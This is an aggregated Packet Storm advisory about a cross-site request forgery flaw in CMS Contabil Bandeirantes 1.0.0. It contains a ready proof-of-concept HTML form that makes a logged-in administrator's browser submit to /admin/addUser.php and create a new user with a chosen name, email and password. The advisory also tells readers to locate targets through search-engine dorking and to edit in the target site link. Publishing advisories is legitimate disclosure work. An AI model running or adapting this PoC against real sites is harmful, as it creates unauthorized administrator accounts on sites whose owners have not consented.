Security
Headlines
HeadlinesLatestCVEs

Headline

CMS Contabil Bandeirantes 1.0.0 Cross Site Request Forgery

CMS Contabil Bandeirantes version 1.0.0 suffers from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#ios#windows#google#php#acer#auth#firefox

======================================================================================================================================
| # Title : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |
| # Vendor : https://scriptmafia.org/ |
======================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine .

[+] Go to the line 12.

[+] Set the target site link Save changes and apply .

[+] infected file : /admin/addUser.php

[+] Save code as poc.html

<section id="main" class="column" style="height: 680px;">

    <h4 class="alert_info">Necessário preencher todos os campos.</h4>  
    <!--<h4 class="alert_warning">A Warning Alert</h4>

    <h4 class="alert_error">An Error Message</h4>

    <h4 class="alert_success">A Success Message</h4>-->

    <article class="module width_full">  
  <form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">  
    <header><h3>Adicionar Usuários</h3></header>

                  <div class="module_content">  
            <fieldset>  
              <label>Nome</label>  
              <input name="nome" id="nome" value="" type="text">  
            </fieldset>  
            <fieldset>  
              <label>Email</label>  
              <input name="email" id="email" value="" type="text">  
            </fieldset>  
            <fieldset>  
              <label>Senha</label>  
              <input name="senha" id="senha" value="" type="text">  
            </fieldset>  
            <div class="clear"></div>  
        </div>    
    <footer>  
      <div class="submit_link">  
        <input id="limpar" name="limpar" value="limpar" type="submit">  
        <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">  
      </div>  
    </footer>  
  </form>    
</article><!-- end of post new article -->

                <div class="spacer"></div>  

</section>

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 9aylasdjroot.dzLiquidWormHussin-X*D4NB4R *ViRuS_Ra3cH yasMouh CraCkEr |
=======================================================================================================================================

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution